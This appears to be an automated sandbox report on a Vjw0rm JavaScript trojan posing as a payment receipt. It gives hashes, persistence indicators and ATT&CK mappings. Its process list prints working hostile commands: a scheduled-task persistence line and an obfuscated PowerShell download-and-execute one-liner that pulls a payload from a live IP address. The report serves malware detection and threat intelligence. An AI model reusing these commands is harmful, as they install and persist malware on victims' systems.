vjw0rm | 2b3792055f5035ac6e37c372853654eb1d2ec05425f217b339816b0aa12605a2

General

Target

h6d2_Payment_receipt.js
Size

81KB
MD5

ac46bea5b7fd09b1ab3da2b95cb03006
SHA1

e59702bca30c23aed49b4e24e6f1411c450ba8d2
SHA256

2b3792055f5035ac6e37c372853654eb1d2ec05425f217b339816b0aa12605a2
SHA512

601600fd54e840843d04ea97f5e04389933cff2c49e0bca97207a27fe95937f282a8c3fc35f2e684aeb0f073f049dcd9f74ecf25fd56c9c35109d82d7ca433e4

Score

10^/10

vjw0rm persistence trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://13.78.209.105/E/err.txt

Signatures

Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
Blocklisted process makes network request 1 IoCs

Processes:

wscript.exe

flow pid process

5 1224 wscript.exe

flow	pid	process
5	1224	wscript.exe

Drops startup file 2 IoCs

Processes:

wscript.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\h6d2_Payment_receipt.js	wscript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

wscript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\BB4HJP0E1C = "'C:\\Users\\Admin\\AppData\\Local\\Temp\\h6d2_Payment_receipt.js'"	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1608 schtasks.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1628 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1628 powershell.exe

pid	process
1608	schtasks.exe

pid	process
1628	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1628	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

wscript.exeWScript.exe

description	pid	process	target process
PID 1224 wrote to memory of 1608	1224	wscript.exe	schtasks.exe
PID 1224 wrote to memory of 1608	1224	wscript.exe	schtasks.exe
PID 1224 wrote to memory of 1608	1224	wscript.exe	schtasks.exe
PID 1224 wrote to memory of 1112	1224	wscript.exe	WScript.exe
PID 1224 wrote to memory of 1112	1224	wscript.exe	WScript.exe
PID 1224 wrote to memory of 1112	1224	wscript.exe	WScript.exe
PID 1112 wrote to memory of 1628	1112	WScript.exe	powershell.exe
PID 1112 wrote to memory of 1628	1112	WScript.exe	powershell.exe
PID 1112 wrote to memory of 1628	1112	WScript.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js
1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\h6d2_Payment_receipt.js
2⤵
- Creates scheduled task(s)
PID:1608

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Registry Run Keys / Startup Folder

1

T1060

Scheduled Task

1

T1053

Privilege Escalation

Scheduled Task

1

T1053

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\OWZC107LZZ.vbs
MD5
2b137d3d2ea7ddba63e99586f44e0388

SHA1
d4634061943a78624880537ffa65472fc6195474

SHA256
1af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2

SHA512
6a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115

Download Submit
memory/1112-55-0x0000000000000000-mapping.dmp

Download
memory/1224-53-0x000007FEFC2C1000-0x000007FEFC2C3000-memory.dmp

Filesize
8KB

Download
memory/1608-54-0x0000000000000000-mapping.dmp

Download
memory/1628-58-0x0000000000000000-mapping.dmp

Download
memory/1628-60-0x000007FEF3000000-0x000007FEF3B5D000-memory.dmp

Filesize
11.4MB

Download
memory/1628-62-0x0000000002702000-0x0000000002704000-memory.dmp

Filesize
8KB

Download
memory/1628-63-0x0000000002704000-0x0000000002707000-memory.dmp

Filesize
12KB

Download
memory/1628-61-0x0000000002700000-0x0000000002702000-memory.dmp

Filesize
8KB

Download
memory/1628-64-0x000000000270B000-0x000000000272A000-memory.dmp

Filesize
124KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads